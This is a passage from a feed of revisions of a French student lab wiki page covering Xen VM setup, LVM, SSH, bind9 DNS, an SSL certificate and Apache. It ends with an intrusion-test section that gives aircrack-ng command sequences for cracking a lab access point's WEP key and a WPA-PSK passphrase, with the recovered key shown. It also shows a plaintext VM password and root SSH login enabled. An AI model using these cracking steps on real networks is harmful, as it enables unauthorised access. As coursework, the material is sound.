Comme pour le cassage de la clé WEP, on utilise aircrack-ng:&lt;br /&gt;
&lt;br /&gt;
 airmon-ng&lt;br /&gt;
&lt;br /&gt;
On récupère le nom de notre interface qui est wlan0mon puis on le lance en mode moniteur sur le channel 7:&lt;br /&gt;
&lt;br /&gt;
 airmon-ng start wlan0mon 4&lt;br /&gt;
&lt;br /&gt;
Il nous faut un point d'accès pour pouvoir casser une clé WPA en récupérant son BSSID: &lt;br /&gt;
&lt;br /&gt;
 airodump-ng wlan0mon&lt;br /&gt;
&lt;br /&gt;
On choisit kracotte11 avec un BSSID 44:AD:D9:5F:87:0A, on récupère ce qu'on appelle &amp;quot;handshake&amp;quot; et on le sauvegarde dans un fichier sauv:&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -c 4 --bssid 44:AD:D9:5F:87:0A -w sauv wlan0mon&lt;br /&gt;
&lt;br /&gt;
On peut commencer le crackage:&lt;br /&gt;
&lt;br /&gt;
 aircrack-ng sauv-01.cap -w dico.txt&lt;/div&gt;</summary>
		<author><name>Rbonvale</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G4&amp;diff=57094</id>
		<title>TP sysres IMA5 2021/2022 G4</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G4&amp;diff=57094"/>
				<updated>2021-12-13T18:42:31Z</updated>
		
		<summary type="html">&lt;p&gt;Rbonvale : /* Serveur apache */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Cablage Réseau=&lt;br /&gt;
&lt;br /&gt;
=Machine Virtuelle=&lt;br /&gt;
&lt;br /&gt;
==Création de la machine virtuelle==&lt;br /&gt;
&lt;br /&gt;
Commande pour la création de la machine virtuelle:&lt;br /&gt;
 root@capbreton:~$ xen-create-image --hostname=Karmeliet --ip=193.48.57.179 --gateway=193.48.57.187 --netmask=255.255.255.240 --dir=/usr/local/xen --password=glopglopglop --dist=bullseye&lt;br /&gt;
&lt;br /&gt;
On créé 2 LV de 10 Go pour les allouer plus tard mais pour cela nous devons d'abord voir quel volume groupe choisir (on choisit celui qui dispose du plus grand espace).&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~# vgdisplay&lt;br /&gt;
  --- Volume group ---&lt;br /&gt;
  VG Name               storage&lt;br /&gt;
  System ID             &lt;br /&gt;
  Format                lvm2&lt;br /&gt;
  Metadata Areas        2&lt;br /&gt;
  Metadata Sequence No  152&lt;br /&gt;
  VG Access             read/write&lt;br /&gt;
  VG Status             resizable&lt;br /&gt;
  MAX LV                0&lt;br /&gt;
  Cur LV                26&lt;br /&gt;
  Open LV               16&lt;br /&gt;
  Max PV                0&lt;br /&gt;
  Cur PV                2&lt;br /&gt;
  Act PV                2&lt;br /&gt;
  VG Size               &amp;lt;5.46 TiB&lt;br /&gt;
  PE Size               4.00 MiB&lt;br /&gt;
  Total PE              1430526&lt;br /&gt;
  Alloc PE / Size       50176 / 196.00 GiB&lt;br /&gt;
  Free  PE / Size       1380350 / &amp;lt;5.27 TiB&lt;br /&gt;
  VG UUID               eusQhE-lOxZ-cQqQ-uFxt-dYjG-LuwI-HL0flc&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~$ lvcreate -L10G -n Karmeliet1 storage&lt;br /&gt;
 root@capbreton:~$ lvcreate -L10G -n Karmeliet2 storage&lt;br /&gt;
&lt;br /&gt;
Il est nécessaire de les formater au format ext4 :&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~$ mkfs.ext4 /dev/storage/Karmeliet1&lt;br /&gt;
 root@capbreton:~$ mkfs.ext4 /dev/storage/Karmeliet2&lt;br /&gt;
&lt;br /&gt;
Dans notre fichier /etc/xen/Karmeliet.cfg, on doit indiquer que notre VM doit possèder les volumes logiques que l'on a créé auparavant (Karmeliet1 et Karmeliet2).&lt;br /&gt;
Il est, également, nécessaire d'indiquer le bridge IMA5sc.&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~$ vim /etc/xen/Karmeliet.cfg&lt;br /&gt;
 #Disk device(s).&lt;br /&gt;
 #&lt;br /&gt;
 root        = '/dev/xvda2 ro'&lt;br /&gt;
 disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/Karmeliet/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/Karmeliet/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/storage/Karmeliet1,xvda3,w',&lt;br /&gt;
                  'phy:/dev/storage/Karmeliet2,xvda4,w'&lt;br /&gt;
              ]&lt;br /&gt;
 #Networking&lt;br /&gt;
 #&lt;br /&gt;
 vif         = [ 'ip=193.48.57.179 ,mac=00:16:3E:5E:59:17 ,bridge=IMA5sc' ]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
On lance la machine virtuelle :&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~$ xl create -c /etc/xen/Karmeliet.cfg&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
On doit créer xvda3 et xvda4 pour nos répertoires var et home:&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ mkdir /mnt/xvda3&lt;br /&gt;
 root@Karmeliet:~$ mkdir /mnt/xvda4&lt;br /&gt;
 root@Karmeliet:~$ mount /dev/xvda3 /mnt/xvda3&lt;br /&gt;
 root@Karmeliet:~$ mount /dev/xvda4 /mnt/xvda4&lt;br /&gt;
&lt;br /&gt;
Le répertoire var doit être placé dans le disque xvda4 :&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ mv /var/* /mnt/xvda4&lt;br /&gt;
&lt;br /&gt;
Dans le fichier /etc/fstab, il est nécesaire d'ajouter les lignes ci-dessous pour pouvoir monter les disques par la suite:&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ /dev/xvda3 /home ext4 defaults 0 2&lt;br /&gt;
 root@Karmeliet:~$ /dev/xvda4 /var ext4 defaults 0 2&lt;br /&gt;
&lt;br /&gt;
La commande suivant permet de monter les disques :&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ mount -a&lt;br /&gt;
&lt;br /&gt;
Pour vérifier que le montage s'est faite correctement, on peut voir avec la commande lsblk si les partitions sont bien visibles :&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ lsblk&lt;br /&gt;
 NAME  MAJ:MIN RM  SIZE RO TYPE MOUNTPOINT&lt;br /&gt;
 xvda1 202:1    0  512M  0 disk [SWAP]&lt;br /&gt;
 xvda2 202:2    0    4G  0 disk /&lt;br /&gt;
 xvda3 202:3    0   10G  0 disk /home&lt;br /&gt;
 xvda4 202:4    0   10G  0 disk /var&lt;br /&gt;
&lt;br /&gt;
Pour accéder à notre VM :&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~# xen console Karmeliet&lt;br /&gt;
&lt;br /&gt;
=Services Internet=&lt;br /&gt;
==Connexion ssh==&lt;br /&gt;
&lt;br /&gt;
Pour se connecter en ssh, nous allons dans le fichier se trouvant au chemin :&lt;br /&gt;
 /etc/ssh/sshd_config&lt;br /&gt;
&lt;br /&gt;
On décommente Port et PermitRootLogin et on leur donne la valeur :&lt;br /&gt;
&lt;br /&gt;
 Port 22222&lt;br /&gt;
 PermitRootLogin Yes&lt;br /&gt;
&lt;br /&gt;
On a plus qu'à se connecter via ssh  : &lt;br /&gt;
 ssh root@193.48.57.179 -p 22222&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==DNS==&lt;br /&gt;
&lt;br /&gt;
On réserve un nom de domaine sur ghandi.net, en l'occurrence le notre sera : &lt;br /&gt;
 karmeliet.site&lt;br /&gt;
&lt;br /&gt;
On rentre notre adresse IPv4 dans le &amp;quot;Glue records&amp;quot;&lt;br /&gt;
 193.48.57.179&lt;br /&gt;
&lt;br /&gt;
On ajoute nos DNS primaire et secondaire pour obtenir un nom de serveur&lt;br /&gt;
 ns1.karmeliet.site (primaire)&lt;br /&gt;
 ns6.gandi.net (secondaire)&lt;br /&gt;
&lt;br /&gt;
===Configuration de bind9===&lt;br /&gt;
&lt;br /&gt;
On installe les paquets&lt;br /&gt;
 apt install bind9&lt;br /&gt;
&lt;br /&gt;
On change le fichier /etc/resolv.conf&lt;br /&gt;
 nameserver 127.0.0.1&lt;br /&gt;
&lt;br /&gt;
On va configurer notre DNS primaire dans le fichier de configuration /etc/bind/named.conf.local&lt;br /&gt;
De plus, on autorise le transfert d'information avec le DNS Secondaire (217.70.177.40)&lt;br /&gt;
 zone &amp;quot;karmeliet.site&amp;quot; {&lt;br /&gt;
   type master;&lt;br /&gt;
   file &amp;quot;/etc/bind/db.karmeliet.site&amp;quot;;&lt;br /&gt;
   allow-transfer { 217.70.177.40; };&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
On créé un fichier db.karmeliet.site ayant le même template que db.local &lt;br /&gt;
&lt;br /&gt;
 ;&lt;br /&gt;
 ; BIND data file for local loopback interface&lt;br /&gt;
 ;&lt;br /&gt;
 $TTL    604800&lt;br /&gt;
 @       IN      SOA      ns1.karmeliet.site.  postmaster.karmeliet.site(&lt;br /&gt;
                              4         ; Serial&lt;br /&gt;
                         604800         ; Refresh&lt;br /&gt;
                          86400         ; Retry&lt;br /&gt;
                        2419200         ; Expire&lt;br /&gt;
                         604800 )       ; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 @       IN      NS      ns1.karmeliet.site.&lt;br /&gt;
 @       IN      NS      ns6.gandi.net.&lt;br /&gt;
 ns1     IN      A       193.48.57.179&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Certificat==&lt;br /&gt;
&lt;br /&gt;
Dans Gandi.net, on achète notre certificat en allant sur &lt;br /&gt;
 SSL certificate&lt;br /&gt;
&lt;br /&gt;
On nous demande une &amp;quot;Certificate Request&amp;quot; CSR que l'on a grâce à la commande &lt;br /&gt;
 openssl req -nodes -newkey rsa:2048 -sha256 -keyout myserver.key -out server.csr&lt;br /&gt;
&lt;br /&gt;
On remplit les différentes informations que l'on nous demande et on récupère notre csr dans server.csr à la fin de la commande.&lt;br /&gt;
&lt;br /&gt;
On va sur la page de notre certificat pour gandi et on copie colle comme ceci dans notre fichier db.karmeliet.site pour que notre certficat soit valide&lt;br /&gt;
&lt;br /&gt;
 ;&lt;br /&gt;
 ; BIND data file for local loopback interface&lt;br /&gt;
 ;&lt;br /&gt;
 $TTL    604800&lt;br /&gt;
 @       IN      SOA      ns1.karmeliet.site.  postmaster.karmeliet.site(&lt;br /&gt;
                              4         ; Serial&lt;br /&gt;
                         604800         ; Refresh&lt;br /&gt;
                          86400         ; Retry&lt;br /&gt;
                        2419200         ; Expire&lt;br /&gt;
                         604800 )       ; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 @       IN      NS      ns1.karmeliet.site.&lt;br /&gt;
 @       IN      NS      ns6.gandi.net.&lt;br /&gt;
 ns1     IN      A       193.48.57.179&lt;br /&gt;
 www	IN	A	193.48.57.179&lt;br /&gt;
 _D83578361950694C7CBA2CF57DDA0CE7.karmeliet.site. 10800 IN CNAME BEF099045291643A940FA49D11E8FB10.4CCF28E6A180333498A3F008A8B6CB32.0e21313c9c6df2403142.sectigo.com.&lt;br /&gt;
&lt;br /&gt;
==Serveur apache==&lt;br /&gt;
&lt;br /&gt;
On installe un serveur apache pour vérifier que tout fonctionne&lt;br /&gt;
 apt install apache2&lt;br /&gt;
&lt;br /&gt;
Pour installer apache correctement on a suivi les instructions sur ce site&lt;br /&gt;
 https://ubuntu.com/tutorials/install-and-configure-apache#1-overview&lt;br /&gt;
&lt;br /&gt;
Puis on a modifier notre fichier de configuration apache pour y mettre notre certificat :&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;VirtualHost *:80&amp;gt;&lt;br /&gt;
         ServerAdmin webmaster@localhost&lt;br /&gt;
         DocumentRoot /var/www/karmeliet.site&lt;br /&gt;
         ServerName karmeliet.site&lt;br /&gt;
         ServerAlias www.karmeliet.site&lt;br /&gt;
         Redirect permanent / https://karmeliet.site/&lt;br /&gt;
 &lt;br /&gt;
 &amp;lt;/VirtualHost&amp;gt; &lt;br /&gt;
 &lt;br /&gt;
 &amp;lt;VirtualHost *:443&amp;gt;&lt;br /&gt;
         ServerAdmin webmaster@localhost&lt;br /&gt;
         DocumentRoot /var/www/karmeliet.site&lt;br /&gt;
         ServerName karmeliet.site&lt;br /&gt;
         ServerAlias www.karmeliet.site &lt;br /&gt;
 &lt;br /&gt;
 &lt;br /&gt;
         SSLEngine on&lt;br /&gt;
         SSLCertificateFile /root/karmeliet.site.crt&lt;br /&gt;
         SSLCertificateKeyFile /root/karmeliet.site.key&lt;br /&gt;
 &lt;br /&gt;
         ErrorLog ${APACHE_LOG_DIR}/error.log&lt;br /&gt;
         CustomLog ${APACHE_LOG_DIR}/access.log combined&lt;br /&gt;
 &lt;br /&gt;
 &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
= Tests d'intrusions =&lt;br /&gt;
&lt;br /&gt;
===5.2 Cassage de clef WEP d’un point d’accès WiFi ===&lt;br /&gt;
&lt;br /&gt;
Cette commande sert à récupérer le nom de l'interface réseau:&lt;br /&gt;
 airmon-ng&lt;br /&gt;
&lt;br /&gt;
Notre interface réseau s'appelle &amp;quot;wlan0mon&amp;quot; (renommé automatiquement parce que celui de base était trop long)&lt;br /&gt;
 &lt;br /&gt;
On démarre l'interface sur le channel 3 :&lt;br /&gt;
 airmon-ng start wlan0mon 3&lt;br /&gt;
&lt;br /&gt;
On récupère le BSSID du point d'accès sur lequel on veut récupérer la clé WEP&lt;br /&gt;
 airodump-ng wlan0mon &lt;br /&gt;
&lt;br /&gt;
On réalise un test d'injection sur cracotte10&lt;br /&gt;
 aireplay-ng -9 -e cracotte10 -a 04:DA:D2:9C:50:59 wlan0mon&lt;br /&gt;
&lt;br /&gt;
On récupère les VI générés par le point d'accès pour les stocker dans output :&lt;br /&gt;
 airodump-ng -c 3 --bssid 04:DA:D2:9C:50:59 -w output wlan0mon&lt;br /&gt;
&lt;br /&gt;
On effectue de fausses authentifications  &lt;br /&gt;
 aireplay-ng -1 0 -e cracotte10 -a 04:DA:D2:9C:50:59 -h 40:A5:EF:D2:11:67 wlan0mon&lt;br /&gt;
&lt;br /&gt;
La clef WEP est alors décriptable :&lt;br /&gt;
 aircrack-ng -b 04:DA:D2:9C:50:59 output*.cap&lt;br /&gt;
&lt;br /&gt;
Le résultat obtenu est le suivant :&lt;br /&gt;
 KEY FOUND! [ 55:55:55:55:5A:BC:11:CB:A4:44:44:44:44 ] &lt;br /&gt;
 Decrypted correctly: 100%&lt;br /&gt;
&lt;br /&gt;
===5.3  Cassage de mot de passe WPA-PSK par force brute ===&lt;br /&gt;
&lt;br /&gt;
Comme pour le cassage de la clé WEP, on utilise aircrack-ng:&lt;br /&gt;
&lt;br /&gt;
 airmon-ng&lt;br /&gt;
&lt;br /&gt;
On récupère le nom de notre interface qui est wlan0mon puis on le lance en mode moniteur sur le channel 7:&lt;br /&gt;
&lt;br /&gt;
 airmon-ng start wlan0mon 4&lt;br /&gt;
&lt;br /&gt;
Il nous faut un point d'accès pour pouvoir casser une clé WPA en récupérant son BSSID: &lt;br /&gt;
&lt;br /&gt;
 airodump-ng wlan0mon&lt;br /&gt;
&lt;br /&gt;
On choisit kracotte11 avec un BSSID 44:AD:D9:5F:87:0A, on récupère ce qu'on appelle &amp;quot;handshake&amp;quot; et on le sauvegarde dans un fichier sauv:&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -c 4 --bssid 44:AD:D9:5F:87:0A -w sauv wlan0mon&lt;br /&gt;
&lt;br /&gt;
On peut commencer le crackage:&lt;br /&gt;
&lt;br /&gt;
 aircrack-ng sauv-01.cap -w dico.txt&lt;/div&gt;</summary>
		<author><name>Rbonvale</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G4&amp;diff=57074</id>
		<title>TP sysres IMA5 2021/2022 G4</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G4&amp;diff=57074"/>
				<updated>2021-12-13T17:27:44Z</updated>
		
		<summary type="html">&lt;p&gt;Rbonvale : /* Certificat */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Cablage Réseau=&lt;br /&gt;
&lt;br /&gt;
=Machine Virtuelle=&lt;br /&gt;
&lt;br /&gt;
==Création de la machine virtuelle==&lt;br /&gt;
&lt;br /&gt;
Commande pour la création de la machine virtuelle:&lt;br /&gt;
 root@capbreton:~$ xen-create-image --hostname=Karmeliet --ip=193.48.57.179 --gateway=193.48.57.187 --netmask=255.255.255.240 --dir=/usr/local/xen --password=glopglopglop --dist=bullseye&lt;br /&gt;
&lt;br /&gt;
On créé 2 LV de 10 Go pour les allouer plus tard mais pour cela nous devons d'abord voir quel volume groupe choisir (on choisit celui qui dispose du plus grand espace).&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~# vgdisplay&lt;br /&gt;
  --- Volume group ---&lt;br /&gt;
  VG Name               storage&lt;br /&gt;
  System ID             &lt;br /&gt;
  Format                lvm2&lt;br /&gt;
  Metadata Areas        2&lt;br /&gt;
  Metadata Sequence No  152&lt;br /&gt;
  VG Access             read/write&lt;br /&gt;
  VG Status             resizable&lt;br /&gt;
  MAX LV                0&lt;br /&gt;
  Cur LV                26&lt;br /&gt;
  Open LV               16&lt;br /&gt;
  Max PV                0&lt;br /&gt;
  Cur PV                2&lt;br /&gt;
  Act PV                2&lt;br /&gt;
  VG Size               &amp;lt;5.46 TiB&lt;br /&gt;
  PE Size               4.00 MiB&lt;br /&gt;
  Total PE              1430526&lt;br /&gt;
  Alloc PE / Size       50176 / 196.00 GiB&lt;br /&gt;
  Free  PE / Size       1380350 / &amp;lt;5.27 TiB&lt;br /&gt;
  VG UUID               eusQhE-lOxZ-cQqQ-uFxt-dYjG-LuwI-HL0flc&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~$ lvcreate -L10G -n Karmeliet1 storage&lt;br /&gt;
 root@capbreton:~$ lvcreate -L10G -n Karmeliet2 storage&lt;br /&gt;
&lt;br /&gt;
Il est nécessaire de les formater au format ext4 :&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~$ mkfs.ext4 /dev/storage/Karmeliet1&lt;br /&gt;
 root@capbreton:~$ mkfs.ext4 /dev/storage/Karmeliet2&lt;br /&gt;
&lt;br /&gt;
Dans notre fichier /etc/xen/Karmeliet.cfg, on doit indiquer que notre VM doit possèder les volumes logiques que l'on a créé auparavant (Karmeliet1 et Karmeliet2).&lt;br /&gt;
Il est, également, nécessaire d'indiquer le bridge IMA5sc.&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~$ vim /etc/xen/Karmeliet.cfg&lt;br /&gt;
 #Disk device(s).&lt;br /&gt;
 #&lt;br /&gt;
 root        = '/dev/xvda2 ro'&lt;br /&gt;
 disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/Karmeliet/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/Karmeliet/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/storage/Karmeliet1,xvda3,w',&lt;br /&gt;
                  'phy:/dev/storage/Karmeliet2,xvda4,w'&lt;br /&gt;
              ]&lt;br /&gt;
 #Networking&lt;br /&gt;
 #&lt;br /&gt;
 vif         = [ 'ip=193.48.57.179 ,mac=00:16:3E:5E:59:17 ,bridge=IMA5sc' ]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
On lance la machine virtuelle :&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~$ xl create -c /etc/xen/Karmeliet.cfg&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
On doit créer xvda3 et xvda4 pour nos répertoires var et home:&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ mkdir /mnt/xvda3&lt;br /&gt;
 root@Karmeliet:~$ mkdir /mnt/xvda4&lt;br /&gt;
 root@Karmeliet:~$ mount /dev/xvda3 /mnt/xvda3&lt;br /&gt;
 root@Karmeliet:~$ mount /dev/xvda4 /mnt/xvda4&lt;br /&gt;
&lt;br /&gt;
Le répertoire var doit être placé dans le disque xvda4 :&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ mv /var/* /mnt/xvda4&lt;br /&gt;
&lt;br /&gt;
Dans le fichier /etc/fstab, il est nécesaire d'ajouter les lignes ci-dessous pour pouvoir monter les disques par la suite:&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ /dev/xvda3 /home ext4 defaults 0 2&lt;br /&gt;
 root@Karmeliet:~$ /dev/xvda4 /var ext4 defaults 0 2&lt;br /&gt;
&lt;br /&gt;
La commande suivant permet de monter les disques :&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ mount -a&lt;br /&gt;
&lt;br /&gt;
Pour vérifier que le montage s'est faite correctement, on peut voir avec la commande lsblk si les partitions sont bien visibles :&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ lsblk&lt;br /&gt;
 NAME  MAJ:MIN RM  SIZE RO TYPE MOUNTPOINT&lt;br /&gt;
 xvda1 202:1    0  512M  0 disk [SWAP]&lt;br /&gt;
 xvda2 202:2    0    4G  0 disk /&lt;br /&gt;
 xvda3 202:3    0   10G  0 disk /home&lt;br /&gt;
 xvda4 202:4    0   10G  0 disk /var&lt;br /&gt;
&lt;br /&gt;
Pour accéder à notre VM :&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~# xen console Karmeliet&lt;br /&gt;
&lt;br /&gt;
=Services Internet=&lt;br /&gt;
==Connexion ssh==&lt;br /&gt;
&lt;br /&gt;
Pour se connecter en ssh, nous allons dans le fichier se trouvant au chemin :&lt;br /&gt;
 /etc/ssh/sshd_config&lt;br /&gt;
&lt;br /&gt;
On décommente Port et PermitRootLogin et on leur donne la valeur :&lt;br /&gt;
&lt;br /&gt;
 Port 22222&lt;br /&gt;
 PermitRootLogin Yes&lt;br /&gt;
&lt;br /&gt;
On a plus qu'à se connecter via ssh  : &lt;br /&gt;
 ssh root@193.48.57.179 -p 22222&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==DNS==&lt;br /&gt;
&lt;br /&gt;
On réserve un nom de domaine sur ghandi.net, en l'occurrence le notre sera : &lt;br /&gt;
 karmeliet.site&lt;br /&gt;
&lt;br /&gt;
On rentre notre adresse IPv4 dans le &amp;quot;Glue records&amp;quot;&lt;br /&gt;
 193.48.57.179&lt;br /&gt;
&lt;br /&gt;
On ajoute nos DNS primaire et secondaire pour obtenir un nom de serveur&lt;br /&gt;
 ns1.karmeliet.site (primaire)&lt;br /&gt;
 ns6.gandi.net (secondaire)&lt;br /&gt;
&lt;br /&gt;
===Configuration de bind9===&lt;br /&gt;
&lt;br /&gt;
On installe les paquets&lt;br /&gt;
 apt install bind9&lt;br /&gt;
&lt;br /&gt;
On change le fichier /etc/resolv.conf&lt;br /&gt;
 nameserver 127.0.0.1&lt;br /&gt;
&lt;br /&gt;
On va configurer notre DNS primaire dans le fichier de configuration /etc/bind/named.conf.local&lt;br /&gt;
De plus, on autorise le transfert d'information avec le DNS Secondaire (217.70.177.40)&lt;br /&gt;
 zone &amp;quot;karmeliet.site&amp;quot; {&lt;br /&gt;
   type master;&lt;br /&gt;
   file &amp;quot;/etc/bind/db.karmeliet.site&amp;quot;;&lt;br /&gt;
   allow-transfer { 217.70.177.40; };&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
On créé un fichier db.karmeliet.site ayant le même template que db.local &lt;br /&gt;
&lt;br /&gt;
 ;&lt;br /&gt;
 ; BIND data file for local loopback interface&lt;br /&gt;
 ;&lt;br /&gt;
 $TTL    604800&lt;br /&gt;
 @       IN      SOA      ns1.karmeliet.site.  postmaster.karmeliet.site(&lt;br /&gt;
                              4         ; Serial&lt;br /&gt;
                         604800         ; Refresh&lt;br /&gt;
                          86400         ; Retry&lt;br /&gt;
                        2419200         ; Expire&lt;br /&gt;
                         604800 )       ; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 @       IN      NS      ns1.karmeliet.site.&lt;br /&gt;
 @       IN      NS      ns6.gandi.net.&lt;br /&gt;
 ns1     IN      A       193.48.57.179&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Certificat==&lt;br /&gt;
&lt;br /&gt;
Dans Gandi.net, on achète notre certificat en allant sur &lt;br /&gt;
 SSL certificate&lt;br /&gt;
&lt;br /&gt;
On nous demande une &amp;quot;Certificate Request&amp;quot; CSR que l'on a grâce à la commande &lt;br /&gt;
 openssl req -nodes -newkey rsa:2048 -sha256 -keyout myserver.key -out server.csr&lt;br /&gt;
&lt;br /&gt;
On remplit les différentes informations que l'on nous demande et on récupère notre csr dans server.csr à la fin de la commande.&lt;br /&gt;
&lt;br /&gt;
On va sur la page de notre certificat pour gandi et on copie colle comme ceci dans notre fichier db.karmeliet.site pour que notre certficat soit valide&lt;br /&gt;
&lt;br /&gt;
 ;&lt;br /&gt;
 ; BIND data file for local loopback interface&lt;br /&gt;
 ;&lt;br /&gt;
 $TTL    604800&lt;br /&gt;
 @       IN      SOA      ns1.karmeliet.site.  postmaster.karmeliet.site(&lt;br /&gt;
                              4         ; Serial&lt;br /&gt;
                         604800         ; Refresh&lt;br /&gt;
                          86400         ; Retry&lt;br /&gt;
                        2419200         ; Expire&lt;br /&gt;
                         604800 )       ; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 @       IN      NS      ns1.karmeliet.site.&lt;br /&gt;
 @       IN      NS      ns6.gandi.net.&lt;br /&gt;
 ns1     IN      A       193.48.57.179&lt;br /&gt;
 www	IN	A	193.48.57.179&lt;br /&gt;
 _D83578361950694C7CBA2CF57DDA0CE7.karmeliet.site. 10800 IN CNAME BEF099045291643A940FA49D11E8FB10.4CCF28E6A180333498A3F008A8B6CB32.0e21313c9c6df2403142.sectigo.com.&lt;br /&gt;
&lt;br /&gt;
==Serveur apache==&lt;br /&gt;
&lt;br /&gt;
On installe un serveur apache pour vérifier que tout fonctionne&lt;br /&gt;
 apt install apache2&lt;br /&gt;
&lt;br /&gt;
= Tests d'intrusions =&lt;br /&gt;
&lt;br /&gt;
===5.2 Cassage de clef WEP d’un point d’accès WiFi ===&lt;br /&gt;
&lt;br /&gt;
Cette commande sert à récupérer le nom de l'interface réseau:&lt;br /&gt;
 airmon-ng&lt;br /&gt;
&lt;br /&gt;
Notre interface réseau s'appelle &amp;quot;wlan0mon&amp;quot; (renommé automatiquement parce que celui de base était trop long)&lt;br /&gt;
 &lt;br /&gt;
On démarre l'interface sur le channel 3 :&lt;br /&gt;
 airmon-ng start wlan0mon 3&lt;br /&gt;
&lt;br /&gt;
On récupère le BSSID du point d'accès sur lequel on veut récupérer la clé WEP&lt;br /&gt;
 airodump-ng wlan0mon &lt;br /&gt;
&lt;br /&gt;
On réalise un test d'injection sur cracotte10&lt;br /&gt;
 aireplay-ng -9 -e cracotte10 -a 04:DA:D2:9C:50:59 wlan0mon&lt;br /&gt;
&lt;br /&gt;
On récupère les VI générés par le point d'accès pour les stocker dans output :&lt;br /&gt;
 airodump-ng -c 3 --bssid 04:DA:D2:9C:50:59 -w output wlan0mon&lt;br /&gt;
&lt;br /&gt;
On effectue de fausses authentifications  &lt;br /&gt;
 aireplay-ng -1 0 -e cracotte10 -a 04:DA:D2:9C:50:59 -h 40:A5:EF:D2:11:67 wlan0mon&lt;br /&gt;
&lt;br /&gt;
La clef WEP est alors décriptable :&lt;br /&gt;
 aircrack-ng -b 04:DA:D2:9C:50:59 output*.cap&lt;br /&gt;
&lt;br /&gt;
Le résultat obtenu est le suivant :&lt;br /&gt;
 KEY FOUND! [ 55:55:55:55:5A:BC:11:CB:A4:44:44:44:44 ] &lt;br /&gt;
 Decrypted correctly: 100%&lt;br /&gt;
&lt;br /&gt;
===5.3  Cassage de mot de passe WPA-PSK par force brute ===&lt;br /&gt;
&lt;br /&gt;
Comme pour le cassage de la clé WEP, on utilise aircrack-ng:&lt;br /&gt;
&lt;br /&gt;
 airmon-ng&lt;br /&gt;
&lt;br /&gt;
On récupère le nom de notre interface qui est wlan0mon puis on le lance en mode moniteur sur le channel 7:&lt;br /&gt;
&lt;br /&gt;
 airmon-ng start wlan0mon 4&lt;br /&gt;
&lt;br /&gt;
Il nous faut un point d'accès pour pouvoir casser une clé WPA en récupérant son BSSID: &lt;br /&gt;
&lt;br /&gt;
 airodump-ng wlan0mon&lt;br /&gt;
&lt;br /&gt;
On choisit kracotte11 avec un BSSID 44:AD:D9:5F:87:0A, on récupère ce qu'on appelle &amp;quot;handshake&amp;quot; et on le sauvegarde dans un fichier sauv:&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -c 4 --bssid 44:AD:D9:5F:87:0A -w sauv wlan0mon&lt;br /&gt;
&lt;br /&gt;
On peut commencer le crackage:&lt;br /&gt;
&lt;br /&gt;
 aircrack-ng sauv-01.cap -w dico.txt&lt;/div&gt;</summary>
		<author><name>Rbonvale</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G4&amp;diff=57073</id>
		<title>TP sysres IMA5 2021/2022 G4</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G4&amp;diff=57073"/>
				<updated>2021-12-13T17:27:26Z</updated>
		
